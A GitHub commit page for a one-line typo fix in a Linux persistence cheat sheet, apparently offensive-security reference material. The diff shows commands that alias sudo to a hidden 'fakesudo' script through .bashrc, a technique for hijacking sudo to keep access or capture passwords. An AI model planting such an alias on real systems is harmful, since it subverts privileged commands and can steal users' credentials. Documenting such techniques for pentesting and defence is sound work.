Fix typo in Linux - Persistence.md

This commit is contained in:
Sean R. Abraham 2021-07-02 16:18:35 -06:00 committed by GitHub
parent 2148c89452
commit 1fcbd576fe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -72,7 +72,7 @@ or add the following line inside its .bashrc file.
```powershell
$ chmod u+x ~/.hidden/fakesudo
$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
```
and create the `fakesudo` script.